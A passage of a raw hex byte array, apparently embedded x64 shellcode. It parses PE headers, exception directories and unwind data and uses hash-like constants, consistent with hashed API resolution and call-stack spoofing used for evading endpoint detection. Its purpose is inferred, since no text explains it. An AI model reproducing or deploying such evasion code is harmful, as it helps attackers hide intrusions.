,0xAC,0xF7,0x00,0x00,0x41,0xB8,0xBC,0x8F,0x3E,0xA6,0x48,0x8D,0x15,0xB3,0xF7,0x00,0x00,0x48,0x89,0xC1,0xE8,0x4C,0xFB,0xFF,0xFF,0x8B,0x45,0xFC,0x8D,0x50,0x01,0x89,0x55,0xFC,0x89,0xC0,0x48,0x69,0xD0,0x60,0x07,0x00,0x00,0x48,0x8B,0x45,0x10,0x48,0x01,0xD0,0xC7,0x44,0x24,0x30,0x06,0x00,0x00,0x00,0x48,0x8D,0x15,0xDB,0xF7,0x00,0x00,0x48,0x89,0x54,0x24,0x28,0x48,0x8D,0x15,0xD1,0xF7,0x00,0x00,0x48,0x89,0x54,0x24,0x20,0x4C,0x8D,0x0D,0x9B,0xF7,0x00,0x00,0x41,0xB8,0x87,0x5A,0x1C,0x55,0x48,0x8D,0x15,0xA2,0xF7,0x00,0x00,0x48,0x89,0xC1,0xE8,0xF7,0xFA,0xFF,0xFF,0x48,0x8B,0x45,0x18,0x8B,0x55,0xFC,0x89,0x10,0x90,0x48,0x83,0xC4,0x50,0x5D,0xC3,0x55,0x48,0x89,0xE5,0x48,0x83,0xEC,0x40,0x48,0x89,0x4D,0x10,0x48,0x89,0x55,0x18,0x4C,0x89,0x45,0x20,0xC7,0x45,0xFC,0x00,0x00,0x00,0x00,0x48,0xC7,0x45,0xF0,0x00,0x00,0x00,0x00,0x48,0xC7,0x45,0xE8,0x00,0x00,0x00,0x00,0x48,0xC7,0x45,0xE0,0x00,0x00,0x00,0x00,0x48,0x8B,0x45,0x10,0x48,0x89,0x45,0xF0,0x48,0x8B,0x45,0xF0,0x8B,0x40,0x3C,0x48,0x63,0xD0,0x48,0x8B,0x45,0xF0,0x48,0x01,0xD0,0x48,0x89,0x45,0xE8,0x48,0x8B,0x45,0xE8,0x48,0x83,0xC0,0x18,0x48,0x89,0xC2,0x48,0x8B,0x45,0xE8,0x0F,0xB7,0x40,0x14,0x0F,0xB7,0xC0,0x48,0x01,0xD0,0x48,0x89,0x45,0xE0,0xC7,0x45,0xF8,0x00,0x00,0x00,0x00,0xE9,0x93,0x00,0x00,0x00,0x8B,0x55,0xF8,0x48,0x89,0xD0,0x48,0xC1,0xE0,0x02,0x48,0x01,0xD0,0x48,0xC1,0xE0,0x03,0x48,0x89,0xC2,0x48,0x8B,0x45,0xE0,0x48,0x01,0xD0,0x48,0x89,0xC2,0x48,0x8D,0x05,0x04,0xF7,0x00,0x00,0x48,0x89,0xC1,0xE8,0x98,0xD6,0x00,0x00,0x85,0xC0,0x75,0x5E,0x8B,0x55,0xF8,0x48,0x89,0xD0,0x48,0xC1,0xE0,0x02,0x48,0x01,0xD0,0x48,0xC1,0xE0,0x03,0x48,0x89,0xC2,0x48,0x8B,0x45,0xE0,0x48,0x01,0xD0,0x8B,0x40,0x0C,0x89,0xC2,0x48,0x8B,0x45,0x10,0x48,0x01,0xD0,0x48,0x89,0xC2,0x48,0x8B,0x45,0x18,0x48,0x89,0x10,0x8B,0x55,0xF8,0x48,0x89,0xD0,0x48,0xC1,0xE0,0x02,0x48,0x01,0xD0,0x48,0xC1,0xE0,0x03,0x48,0x89,0xC2,0x48,0x8B,0x45,0xE0,0x48,0x01,0xD0,0x8B,0x50,0x10,0x48,0x8B,0x45,0x20,0x89,0x10,0xC7,0x45,0xFC,0x01,0x00,0x00,0x00,0xEB,0x18,0x83,0x45,0xF8,0x01,0x48,0x8B,0x45,0xE8,0x0F,0xB7,0x40,0x06,0x0F,0xB7,0xC0,0x39,0x45,0xF8,0x0F,0x82,0x59,0xFF,0xFF,0xFF,0x8B,0x45,0xFC,0x48,0x83,0xC4,0x40,0x5D,0xC3,0x55,0x48,0x89,0xE5,0x48,0x83,0xEC,0x70,0x48,0x89,0x4D,0x10,0xC7,0x45,0xEC,0x00,0x00,0x00,0x00,0xC7,0x45,0xFC,0x00,0x00,0x00,0x00,0x48,0xC7,0x45,0xE0,0x00,0x00,0x00,0x00,0x48,0xC7,0x45,0xF0,0x00,0x00,0x00,0x00,0xC7,0x45,0xDC,0x00,0x00,0x00,0x00,0x48,0xC7,0x45,0xD0,0x00,0x00,0x00,0x00,0xC7,0x45,0xCC,0x00,0x00,0x00,0x00,0x48,0xC7,0x45,0xC0,0x00,0x00,0x00,0x00,0x48,0x8B,0x45,0x10,0xBA,0x01,0x00,0x00,0x00,0x48,0x89,0xC1,0xE8,0x09,0x4F,0x00,0x00,0x48,0x89,0x45,0xE0,0x48,0x83,0x7D,0xE0,0x00,0x0F,0x84,0x3C,0x02,0x00,0x00,0x48,0x8D,0x4D,0xCC,0x48,0x8D,0x55,0xD0,0x48,0x8B,0x45,0xE0,0x49,0x89,0xC8,0x48,0x89,0xC1,0xE8,0x58,0xFE,0xFF,0xFF,0x89,0x45,0xEC,0x83,0x7D,0xEC,0x00,0x0F,0x84,0x1B,0x02,0x00,0x00,0x48,0x8B,0x55,0xD0,0x48,0x8B,0x45,0x10,0x48,0x89,0x90,0x28,0x05,0x00,0x00,0x48,0x8B,0x45,0x10,0x0F,0xB6,0x80,0x14,0x04,0x00,0x00,0x84,0xC0,0x75,0x12,0x48,0x8B,0x45,0x10,0x8B,0x80,0x10,0x04,0x00,0x00,0x85,0xC0,0x0F,0x84,0x84,0x00,0x00,0x00,0x48,0x8B,0x45,0x10,0x0F,0xB6,0x80,0x14,0x04,0x00,0x00,0x84,0xC0,0x74,0x2C,0x48,0x8B,0x45,0x10,0x48,0x05,0x14,0x04,0x00,0x00,0x48,0x89,0xC1,0xE8,0x3C,0x85,0x00,0x00,0x89,0xC2,0x48,0x8B,0x45,0xE0,0x41,0xB8,0x00,0x00,0x00,0x00,0x48,0x89,0xC1,0xE8,0x92,0x4C,0x00,0x00,0x48,0x89,0x45,0xF0,0xEB,0x20,0x48,0x8B,0x45,0x10,0x8B,0x90,0x10,0x04,0x00,0x00,0x48,0x8B,0x45,0xE0,0x41,0xB8,0x00,0x00,0x00,0x00,0x48,0x89,0xC1,0xE8,0x70,0x4C,0x00,0x00,0x48,0x89,0x45,0xF0,0x48,0x83,0x7D,0xF0,0x00,0x0F,0x84,0x88,0x01,0x00,0x00,0x48,0x8B,0x45,0x10,0x48,0x8B,0x55,0xF0,0x48,0x89,0x90,0x28,0x05,0x00,0x00,0x48,0x8B,0x45,0x10,0x48,0x8B,0x55,0xF0,0x48,0x89,0x90,0x48,0x07,0x00,0x00,0x48,0x8B,0x45,0x10,0x0F,0xB6,0x80,0x40,0x05,0x00,0x00,0x84,0xC0,0x74,0x79,0x48,0x8B,0x45,0xD0,0x48,0x89,0xC1,0x48,0x8B,0x45,0x10,0x48,0x8B,0x80,0x28,0x05,0x00,0x00,0x48,0x89,0xC2,0x48,0x89,0xC8,0x48,0x29,0xD0,0x89,0xC2,0x8B,0x45,0xCC,0x01,0xD0,0x83,0xE8,0x01,0x89,0x45,0xDC,0x48,0x8B,0x45,0x10,0x4C,0x8D,0x88,0x40,0x05,0x00,0x00,0x48,0x8B,0x45,0x10,0x4C,0x8D,0x80,0x40,0x06,0x00,0x00,0x48,0x8B,0x45,0x10,0x48,0x8B,0x80,0x28,0x05,0x00,0x00,0x8B,0x55,0xDC,0x48,0x8D,0x4D,0xC0,0x48,0x89,0x4C,0x24,0x20,0x48,0x89,0xC1,0xE8,0xBA,0xFA,0xFF,0xFF,0x89,0x45,0xEC,0x83,0x7D,0xEC,0x00,0x0F,0x84,0xF4,0x00,0x00,0x00,0x48,0x8B,0x55,0xC0,0x48,0x8B,0x45,0x10,0x48,0x89,0x90,0x28,0x05,0x00,0x00,0x48,0x8B,0x45,0x10,0x8B,0x80,0x18,0x05,0x00,0x00,0x85,0xC0,0x74,0x66,0x48,0x8B,0x45,0xD0,0x48,0x89,0xC1,0x48,0x8B,0x45,0x10,0x48,0x8B,0x80,0x28,0x05,0x00,0x00,0x48,0x89,0xC2,0x48,0x89,0xC8,0x48,0x29,0xD0,0x89,0xC2,0x8B,0x45,0xCC,0x01,0xD0,0x83,0xE8,0x01,0x89,0x45,0xDC,0x48,0x8B,0x45,0x10,0x8B,0x80,0x18,0x05,0x00,0x00,0x39,0x45,0xDC,0x0F,0x82,0x9F,0x00,0x00,0x00,0x48,0x8B,0x45,0x10,0x48,0x8B,0x80,0x28,0x05,0x00,0x00,0x48,0x89,0xC2,0x48,0x8B,0x45,0x10,0x8B,0x80,0x18,0x05,0x00,0x00,0x89,0xC0,0x48,0x01,0xD0,0x48,0x89,0xC2,0x48,0x8B,0x45,0x10,0x48,0x89,0x90,0x28,0x05,0x00,0x00,0x48,0x8B,0x45,0x10,0x48,0x8B,0x80,0x48,0x07,0x00,0x00,0x48,0x85,0xC0,0x74,0x30,0x48,0x8B,0x45,0x10,0x48,0x8B,0x80,0x28,0x05,0x00,0x00,0x48,0x89,0xC1,0x48,0x8B,0x45,0x10,0x48,0x8B,0x80,0x48,0x07,0x00,0x00,0x48,0x89,0xC2,0x48,0x89,0xC8,0x48,0x29,0xD0,0x89,0xC2,0x48,0x8B,0x45,0x10,0x89,0x90,0x50,0x07,0x00,0x00,0xEB,0x1F,0x48,0x8B,0x45,0x10,0x48,0x8B,0x80,0x28,0x05,0x00,0x00,0x48,0x89,0xC2,0x48,0x8B,0x45,0xE0,0x48,0x29,0xC2,0x48,0x8B,0x45,0x10,0x89,0x90,0x50,0x07,0x00,0x00,0xC7,0x45,0xFC,0x01,0x00,0x00,0x00,0xEB,0x0D,0x90,0xEB,0x0A,0x90,0xEB,0x07,0x90,0xEB,0x04,0x90,0xEB,0x01,0x90,0x8B,0x45,0xFC,0x48,0x83,0xC4,0x70,0x5D,0xC3,0x55,0x48,0x89,0xE5,0x48,0x83,0xEC,0x60,0x48,0x89,0x4D,0x10,0x89,0x55,0x18,0x44,0x89,0x45,0x20,0x4C,0x89,0x4D,0x28,0xC7,0x45,0xFC,0x00,0x00,0x00,0x00,0x48,0xC7,0x45,0xE8,0x00,0x00,0x00,0x00,0xC7,0x45,0xE4,0x00,0x00,0x00,0x00,0xC7,0x45,0xE0,0x00,0x00,0x00,0x00,0xC7,0x45,0xF8,0x00,0x00,0x00,0x00,0xC7,0x45,0xF4,0x00,0x00,0x00,0x00,0xC7,0x45,0xDC,0x00,0x00,0x00,0x00,0xC7,0x45,0xF0,0x01,0x00,0x00,0x00,0x48,0xB8,0x01,0x02,0x01,0x01,0x02,0x03,0x01,0x00,0x48,0x89,0x45,0xC4,0xC7,0x45,0xCC,0x02,0x03,0x01,0x01,0x48,0x8B,0x45,0xC4,0x48,0x89,0x45,0xD0,0x8B,0x45,0xCC,0x89,0x45,0xD8,0xC7,0x45,0xE4,0x00,0x00,0x00,0x00,0xC7,0x45,0xE0,0x00,0x00,0x00,0x00,0xC7,0x45,0xF8,0x00,0x00,0x00,0x00,0xC7,0x45,0xF4,0x00,0x00,0x00,0x00,0xC7,0x45,0xF0,0x01,0x00,0x00,0x00,0x48,0x8B,0x45,0x28,0x8B,0x40,0x08,0x89,0xC2,0x48,0x8B,0x45,0x30,0x48,0x01,0xD0,0x48,0x89,0x45,0xE8,0x48,0x8B,0x45,0x10,0x48,0x8B,0x80,0x28,0x05,0x00,0x00,0x89,0xC1,0x48,0x8B,0x45,0x28,0x8B,0x00,0x48,0x8B,0x55,0x30,0x01,0xC2,0x89,0xC8,0x29,0xD0,0x89,0x45,0xDC,0xE9,0x17,0x02,0x00,0x00,0x48,0x8B,0x45,0xE8,0x8B,0x55,0xF8,0x0F,0xB6,0x44,0x50,0x05,0x83,0xE0,0x0F,0x0F,0xB6,0xC0,0x89,0x45,0xE4,0x48,0x8B,0x45,0xE8,0x8B,0x55,0xF8,0x0F,0xB6,0x44,0x50,0x05,0xC0,0xE8,0x04,0x0F,0xB6,0xC0,0x89,0x45,0xE0,0x48,0x8B,0x45,0xE8,0x8B,0x55,0xF8,0x0F,0xB6,0x44,0x50,0x04,0x0F,0xB6,0xC0,0x39,0x45,0xDC,0x0F,0x82,0xB7,0x01,0x00,0x00,0x83,0x7D,0xE4,0x00,0x75,0x5B,0x48,0x8B,0x45,0x10,0x8B,0x80,0x1C,0x05,0x00,0x00,0x8D,0x50,0x08,0x48,0x8B,0x45,0x10,0x89,0x90,0x1C,0x05,0x00,0x00,0x83,0x7D,0xE0,0x05,0x0F,0x85,0x8A,0x01,0x00,0x00,0x48,0x8B,0x45,0x10,0xC7,0x80,0x30,0x05,0x00,0x00,0x01,0x00,0x00,0x00,0x48,0x8B,0x45,0xE8,0x0F,0xB6,0x40,0x02,0x0F,0xB6,0xD0,0x48,0x8B,0x45,0x10,0x89,0x90,0x34,0x05,0x00,0x00,0x8B,0x45,0xF8,0x83,0xC0,0x01,0x89,0xC2,0x48,0x8B,0x45,0x10,0x89,0x90,0x38,0x05,0x00,0x00,0xE9,0x50,0x01,0x00,0x00,0x83,0x7D,0xE4,0x04,0x75,0x09,0x83,0x45,0xF8,0x01,0xE9,0x41,0x01,0x00,0x00,0x83,0x7D,0xE4,0x05,0x75,0x09,0x83,0x45,0xF8,0x02,0xE9,0x32,0x01,0x00,0x00,0x83,0x7D,0xE4,0x02,0x75,0x24,0x48,0x8B,0x45,0x10,0x8B,0x80,0x1C,0x05,0x00,0x00,0x8B,0x55,0xE0,0x83,0xC2,0x01,0xC1,0xE2,0x03,0x01,0xC2,0x48,0x8B,0x45,0x10,0x89,0x90,0x1C,0x05,0x00,0x00,0xE9,0x08,0x01,0x00,0x00,0x83,0x7D,0xE4,0x01,0x75,0x59,0x83,0x45,0xF8,0x01,0x48,0x8B,0x45,0xE8,0x8B,0x55,0xF8,0x0F,0xB7,0x44,0x50,0x04,0x0F,0xB7,0xC0,0x89,0x45,0xF4,0x83,0x7D,0xE0,0x00,0x75,0x06,0xC1,0x65,0xF4,0x03,0xEB,0x19,0x83,0x45,0xF8,0x01,0x48,0x8B,0x45,0xE8,0x8B,0x55,0xF8,0x0F,0xB7,0x44,0x50,0x04,0x0F,0xB7,0xC0,0xC1,0xE0,0x10,0x01,0x45,0xF4,0x48,0x8B,0x45,0x10,0x8B,0x90,0x1C,0x05,0x00,0x00,0x8B,0x45,0xF4,0x01,0xC2,0x48,0x8B,0x45,0x10,0x89,0x90,0x1C,0x05,0x00,0x00,0xE9,0xA9,0x00,0x00,0x00,0x83,0x7D,0xE4,0x03,0x75,0x31,0x48,0x8B,0x45,0x10,0xC7,0x80,0x20,0x05,0x00,0x00,0x01,0x00,0x00,0x00,0x83,0x7D,0x18,0x00,0x0F,0x85,0x8B,0x00,0x00,0x00,0x48,0x8B,0x45,0x10,0x8B,0x80,0x1C,0x05,0x00,0x00,0x8D,0x50,0xF0,0x48,0x8B,0x45,0x10,0x89,0x90,0x1C,0x05,0x00,0x00,0xEB,0x72,0x83,0x7D,0xE4,0x06,0x74,0x6C,0x83,0x7D,0xE4,0x08,0x75,0x06,0x83,0x45,0xF8,0x01,0xEB,0x60,0x83,0x7D,0xE4,0x09,0x75,0x06,0x83,0x45,0xF8,0x02,0xEB,0x54,0x83,0x7D,0xE4,0x0A,0x75,0x24,0x48,0x8B,0x45,0x10,0xC7,0x80,0x54,0x07,0x00,0x00,0x01,0x00,0x00,0x00,0x83,0x7D,0xE0,0x00,0x0F,0x95,0xC0,0x0F,0xB6,0xD0,0x48,0x8B,0x45,0x10,0x89,0x90,0x58,0x07,0x00,0x00,0xEB,0x62,0x8B,0x45,0xE4,0x89,0xC2,0x48,0x8D,0x05,0x27,0xF1,0x00,0x00,0x48,0x89,0xC1,0xE8,0x27,0x27,0x00,0x00,0x48,0x8D,0x05,0x3A,0xF1,0x00,0x00,0x48,0x89,0xC1,0xE8,0x18,0x27,0x00,0x00,0xC7,0x45,0xF0,0x00,0x00,0x00,0x00,0x83,0x45,0xF8,0x01,0xEB,0x1E,0x8B,0x45,0xE4,0x0F,0xB6,0x44,0x05,0xD0,0x0F,0xB6,0xC0,0x01,0x45,0xF8,0x83,0x7D,0xE4,0x01,0x75,0x0A,0x83,0x7D,0xE0,0x00,0x74,0x04,0x83,0x45,0xF8,0x01,0x48,0x8B,0x45,0xE8,0x0F,0xB6,0x40,0x02,0x0F,0xB6,0xC0,0x39,0x45,0xF8,0x0F,0x82,0xD5,0xFD,0xFF,0xFF,0x83,0x7D,0xF0,0x00,0x74,0x7E,0x48,0x8B,0x45,0xE8,0x0F,0xB6,0x00,0xC0,0xE8,0x03,0x0F,0xB6,0xC0,0x83,0xE0,0x04,0x85,0xC0,0x74,0x32,0x48,0x8B,0x45,0xE8,0x0F,0xB6,0x40,0x02,0x0F,0xB6,0xC0,0x89,0x45,0xF8,0x8B,0x45,0xF8,0x83,0xE0,0x01,0x85,0xC0,0x74,0x04,0x83,0x45,0xF8,0x01,0x8B,0x45,0xF8,0x48,0x8D,0x14,0x00,0x48,0x8B,0x45,0xE8,0x48,0x01,0xD0,0x48,0x83,0xC0,0x04,0x48,0x89,0x45,0x28,0x48,0x8B,0x45,0xE8,0x0F,0xB6,0x00,0xC0,0xE8,0x03,0x0F,0xB6,0xC0,0x83,0xE0,0x04,0x85,0xC0,0x0F,0x85,0x15,0xFD,0xFF,0xFF,0x48,0x8B,0x45,0x10,0x8B,0x80,0x1C,0x05,0x00,0x00,0x8D,0x50,0x08,0x48,0x8B,0x45,0x10,0x89,0x90,0x1C,0x05,0x00,0x00,0xC7,0x45,0xFC,0x01,0x00,0x00,0x00,0xEB,0x01,0x90,0x8B,0x45,0xFC,0x48,0x83,0xC4,0x60,0x5D,0xC3,0x55,0x48,0x89,0xE5,0x48,0x83,0xEC,0x50,0x48,0x89,0x4D,0x10,0x89,0x55,0x18,0x44,0x89,0x45,0x20,0xC7,0x45,0xFC,0x00,0x00,0x00,0x00,0xC7,0x45,0xF8,0x00,0x00,0x00,0x00,0x48,0xC7,0x45,0xF0,0x00,0x00,0x00,0x00,0x48,0xC7,0x45,0xE8,0x00,0x00,0x00,0x00,0x48,0x8B,0x45,0x10,0x48,0x8B,0x80,0x28,0x05,0x00,0x00,0x48,0x89,0xC1,0x48,0x8D,0x55,0xE8,0x48,0x8D,0x45,0xF0,0x49,0x89,0xD0,0x48,0x89,0xC2,0xE8,0x74,0x05,0x00,0x00,0x89,0x45,0xF8,0x48,0x8B,0x45,0xF0,0x48,0x85,0xC0,0x74,0x32,0x48,0x8B,0x4D,0xE8,0x4C,0x8B,0x4D,0xF0,0x44,0x8B,0x45,0x20,0x8B,0x55,0x18,0x48,0x8B,0x45,0x10,0x48,0x89,0x4C,0x24,0x20,0x48,0x89,0xC1,0xE8,0xFA,0xFB,0xFF,0xFF,0x89,0x45,0xF8,0x83,0x7D,0xF8,0x00,0x74,0x0C,0xC7,0x45,0xFC,0x01,0x00,0x00,0x00,0xEB,0x04,0x90,0xEB,0x01,0x90,0x8B,0x45,0xFC,0x48,0x83,0xC4,0x50,0x5D,0xC3,0x55,0x48,0x89,0xE5,0x48,0x83,0xEC,0x30,0x48,0x89,0x4D,0x10,0x89,0x55,0x18,0xC7,0x45,0xF8,0x00,0x00,0x00,0x00,0x48,0xC7,0x45,0xF0,0x00,0x00,0x00,0x00,0xC7,0x45,0xFC,0x00,0x00,0x00,0x00,0xEB,0x6E,0x8B,0x45,0xFC,0x48,0x69,0xD0,0x60,0x07,0x00,0x00,0x48,0x8B,0x45,0x10,0x48,0x01,0xD0,0x48,0x89,0x45,0xF0,0x48,0x8B,0x45,0xF0,0xC7,0x80,0x40,0x07,0x00,0x00,0x00,0x00,0x00,0x00,0x48,0x8B,0x45,0xF0,0x48,0x89,0xC1,0xE8,0xCB,0xF8,0xFF,0xFF,0x89,0x45,0xF8,0x83,0x7D,0xF8,0x00,0x74,0x2E,0x8B,0x4D,0x18,0x8B,0x55,0xFC,0x48,0x8B,0x45,0xF0,0x41,0x89,0xC8,0x48,0x89,0xC1,0xE8,0xEF,0xFE,0xFF,0xFF,0x89,0x45,0xF8,0x83,0x7D,0xF8,0x00,0x74,0x13,0x48,0x8B,0x45,0xF0,0xC7,0x80,0x40,0x07,0x00,0x00,0x01,0x00,0x00,0x00,0xEB,0x04,0x90,0xEB,0x01,0x90,0x83,0x45,0xFC,0x01,0x8B,0x45,0xFC,0x3B,0x45,0x18,0x72,0x8A,0x90,0x90,0x48,0x83,0xC4,0x30,0x5D,0xC3,0x55,0x48,0x89,0xE5,0x48,0x89,0x4D,0x10,0x48,0x89,0x55,0x18,0x48,0x8B,0x45,0x10,0x48,0x8B,0x40,0x30,0x48,0x83,0xE8,0x08,0x48,0x89,0xC2,0x48,0x8B,0x45,0x10,0x48,0x89,0x50,0x30,0x48,0x8B,0x45,0x10,0x48,0x8B,0x40,0x30,0x48,0x8B,0x55,0x18,0x48,0x89,0x10,0x90,0x5D,0xC3,0x55,0x53,0x48,0x83,0xEC,0x68,0x48,0x8D,0x6C,0x24,0x60,0x48,0x89,0x4D,0x20,0x89,0x55,0x28,0x4C,0x89,0x45,0x30,0x48,0xC7,0x45,0xF8,0x00,0x00,0x00,0x00,0xC7,0x45,0xF4,0x00,0x00,0x00,0x00,0x48,0xC7,0x45,0xD8,0x00,0x00,0x00,0x00,0x48,0x8B,0x45,0x30,0x48,0xC7,0x40,0x38,0x00,0x00,0x00,0x00,0x48,0x8B,0x45,0x30,0xBA,0x00,0x00,0x00,0x00,0x48,0x89,0xC1,0xE8,0x81,0xFF,0xFF,0xFF,0xC7,0x45,0xF0,0x00,0x00,0x00,0x00,0xE9,0x0F,0x03,0x00,0x00,0x8B,0x45,0x28,0x2B,0x45,0xF0,0x83,0xE8,0x01,0x89,0xC0,0x48,0x69,0xD0,0x60,0x07,0x00,0x00,0x48,0x8B,0x45,0x20,0x48,0x01,0xD0,0x48,0x89,0x45,0xD8,0x48,0x8B,0x45,0xD8,0x8B,0x80,0x40,0x07,0x00,0x00,0x85,0xC0,0x0F,0x84,0xDB,0x02,0x00,0x00,0x48,0x8B,0x45,0xD8,0x8B,0x80,0x54,0x07,0x00,0x00,0x85,0xC0,0x0F,0x84,0x5F,0x01,0x00,0x00,0x48,0x8B,0x45,0x30,0x48,0x8B,0x40,0x30,0x48,0x8B,0x00,0x48,0x89,0x45,0xC8,0x48,0x8B,0x45,0x30,0x48,0x8B,0x40,0x30,0x48,0x83,0xC0,0x08,0x48,0x89,0x45,0xC0,0x48,0x8B,0x45,0x30,0x48,0x8B,0x40,0x30,0x48,0x89,0xC1,0x48,0x8B,0x45,0xD8,0x8B,0x80,0x1C,0x05,0x00,0x00,0x89,0xC2,0x48,0x89,0xC8,0x48,0x29,0xD0,0x48,0x89,0xC2,0x48,0x8B,0x45,0x30,0x48,0x89,0x50,0x30,0x48,0x8B,0x45,0xD8,0x8B,0x80,0x1C,0x05,0x00,0x00,0x83,0xE8,0x08,0x89,0x45,0xEC,0x48,0x8B,0x45,0xD8,0x8B,0x80,0x58,0x07,0x00,0x00,0x85,0xC0,0x74,0x04,0x83,0x45,0xEC,0x08,0x48,0x8B,0x45,0x30,0x48,0x8B,0x40,0x30,0x48,0x89,0xC2,0x8B,0x45,0xEC,0x48,0x01,0xD0,0x48,0x83,0xC0,0x28,0x48,0xC7,0x00,0x00,0x00,0x00,0x00,0x48,0x8B,0x45,0x30,0x48,0x8B,0x40,0x30,0x48,0x89,0xC2,0x8B,0x45,0xEC,0x48,0x01,0xD0,0x48,0x83,0xC0,0x20,0x48,0x89,0xC3,0x48,0x8B,0x55,0xC0,0x48,0x8B,0x45,0x30,0x48,0x89,0xC1,0xE8,0x60,0xF0,0xFF,0xFF,0x48,0x89,0x03,0x48,0x8B,0x45,0x30,0x48,0x8B,0x40,0x30,0x48,0x89,0xC2,0x8B,0x45,0xEC,0x48,0x01,0xD0,0x48,0x83,0xC0,0x18,0x48,0xC7,0x00,0x00,0x00,0x00,0x00,0x48,0x8B,0x45,0x30,0x48,0x8B,0x40,0x30,0x48,0x89,0xC2,0x8B,0x45,0xEC,0x48,0x01,0xD0,0x48,0x83,0xC0,0x10,0x48,0xC7,0x00,0x00,0x00,0x00,0x00,0x48,0x8B,0x45,0x30,0x48,0x8B,0x40,0x30,0x48,0x89,0xC2,0x8B,0x45,0xEC,0x48,0x01,0xD0,0x48,0x83,0xC0,0x08,0x48,0x89,0xC2,0x48,0x8B,0x45,0xC8,0x48,0x89,0x02,0x48,0x8B,0x45,0xD8,0x8B,0x80,0x58,0x07,0x00,0x00,0x85,0xC0,0x74,0x18,0x48,0x8B,0x45,0x30,0x48,0x8B,0x40,0x30,0x48,0x89,0xC2,0x8B,0x45,0xEC,0x48,0x01,0xD0,0x48,0xC7,0x00,0x00,0x00,0x00,0x00,0x48,0x8B,0x45,0x30,0x48,0x8B,0x40,0x30,0x48,0x8B,0x55,0xD8,0x48,0x8B,0x92,0x28,0x05,0x00,0x00,0x48,0x89,0x10,0x48,0x8B,0x45,0x30,0x48,0x8B,0x40,0x30,0x48,0x83,0xE8,0x08,0x48,0x89,0xC2,0x48,0x8B,0x45,0x30,0x48,0x89,0x50,0x38,0xE9,0x42,0x01,0x00,0x00,0x83,0x7D,0xF4,0x00,0x0F,0x84,0xE3,0x00,0x00,0x00,0x48,0x8B,0x45,0xD8,0x8B,0x80,0x30,0x05,0x00,0x00,0x85,0xC0,0x0F,0x84,0xD1,0x00,0x00,0x00,0x48,0x8B,0x45,0xD8,0x8B,0x90,0x34,0x05,0x00,0x00,0x48,0x8B,0x45,0xD8,0x8B,0x80,0x38,0x05,0x00,0x00,0x89,0xC1,0x89,0xD0,0x29,0xC8,0x89,0x45,0xD4,0xC7,0x45,0xE8,0x00,0x00,0x00,0x00,0xC7,0x45,0xE4,0x00,0x00,0x00,0x00,0xEB,0x19,0x48,0x8B,0x45,0x30,0xBA,0x00,0x00,0x00,0x00,0x48,0x89,0xC1,0xE8,0x7B,0xFD,0xFF,0xFF,0x83,0x45,0xE8,0x08,0x83,0x45,0xE4,0x01,0x8B,0x45,0xE4,0x3B,0x45,0xD4,0x72,0xDF,0x48,0x8B,0x55,0xF8,0x48,0x8B,0x45,0x30,0x48,0x89,0xC1,0xE8,0x34,0xEF,0xFF,0xFF,0x48,0x89,0xC2,0x48,0x8B,0x45,0x30,0x48,0x89,0xC1,0xE8,0x4C,0xFD,0xFF,0xFF,0x48,0x8B,0x45,0x30,0x48,0x8B,0x40,0x30,0x48,0x89,0xC1,0x48,0x8B,0x45,0xD8,0x8B,0x80,0x1C,0x05,0x00,0x00,0x2B,0x45,0xE8,0x83,0xE8,0x08,0x89,0xC2,0x48,0x89,0xC8,0x48,0x29,0xD0,0x48,0x89,0xC2,0x48,0x8B,0x45,0x30,0x48,0x89,0x50,0x30,0x48,0x8B,0x45,0x30,0x48,0x8B,0x40,0x30,0x48,0x8B,0x55,0xD8,0x48,0x8B,0x92,0x28,0x05,0x00,0x00,0x48,0x89,0x10,0x48,0x8B,0x45,0x30,0x48,0x8B,0x40,0x30,0x48,0x83,0xE8,0x08,0x48,0x89,0xC2,0x48,0x8B,0x45,0x30,0x48,0x89,0x50,0x38,0xC7,0x45,0xF4,0x00,0x00,0x00,0x00,0xEB,0x55,0x48,0x8B,0x45,0x30,0x48,0x8B,0x40,0x30,0x48,0x89,0xC1,0x48,0x8B,0x45,0xD8,0x8B,0x80,0x1C,0x05,0x00,0x00,0x89,0xC2,0x48,0x89,0xC8,0x48,0x29,0xD0,0x48,0x89,0xC2,0x48,0x8B,0x45,0x30,0x48,0x89,0x50,0x30,0x48,0x8B,0x45,0x30,0x48,0x8B,0x40,0x30,0x48,0x8B,0x55,0xD8,0x48,0x8B,0x92,0x28,0x05,0x00,0x00,0x48,0x89,0x10,0x48,0x8B,0x45,0x30,0x48,0x8B,0x40,0x30,0x48,0x83,0xE8,0x08,0x48,0x89,0xC2,0x48,0x8B,0x45,0x30,0x48,0x89,0x50,0x38,0x48,0x8B,0x45,0xD8,0x8B,0x80,0x20,0x05,0x00,0x00,0x85,0xC0,0x74,0x1B,0x48,0x8B,0x45,0x30,0x48,0x8B,0x40,0x30,0x48,0x89,0x45,0xF8,0x48,0x83,0x45,0xF8,0x08,0xC7,0x45,0xF4,0x01,0x00,0x00,0x00,0xEB,0x01,0x90,0x83,0x45,0xF0,0x01,0x8B,0x45,0xF0,0x3B,0x45,0x28,0x0F,0x82,0xE5,0xFC,0xFF,0xFF,0x90,0x90,0x48,0x83,0xC4,0x68,0x5B,0x5D,0xC3,0x48,0x8B,0x04,0x24,0xC3,0x90,0x0F,0x0B,0x48,0x8D,0x44,0x24,0x08,0xC3,0x90,0x0F,0x0B,0x55,0x48,0x89,0xE5,0x48,0x83,0xEC,0x40,0x48,0x89,0x4D,0x10,0x48,0x89,0x55,0x18,0x4C,0x89,0x45,0x20,0x4C,0x89,0x4D,0x28,0x48,0x8B,0x45,0x10,0x48,0x89,0xC1,0xE8,0xC5,0x3E,0x00,0x00,0x48,0x89,0x45,0xF8,0x48,0x83,0x7D,0xF8,0x00,0x0F,0x84,0x8A,0x00,0x00,0x00,0x48,0x8B,0x45,0xF8,0x8B,0x40,0x3C,0x48,0x63,0xD0,0x48,0x8B,0x45,0xF8,0x48,0x01,0xD0,0x48,0x89,0x45,0xF0,0x48,0x8B,0x45,0xF0,0x8B,0x80,0xA0,0x00,0x00,0x00,0x89,0x45,0xEC,0x48,0x8B,0x45,0xF0,0x8B,0x80,0xA4,0x00,0x00,0x00,0x89,0x45,0xE8,0x83,0x7D,0xE8,0x00,0x74,0x3E,0x48,0x8B,0x45,0x18,0x48,0x8B,0x55,0xF8,0x48,0x89,0x10,0x8B,0x45,0xE8,0x89,0xC2,0xB8,0xAB,0xAA,0xAA,0xAA,0x48,0x0F,0xAF,0xC2,0x48,0xC1,0xE8,0x20,0x89,0xC2,0xC1,0xEA,0x03,0x48,0x8B,0x45,0x28,0x89,0x10,0x8B,0x55,0xEC,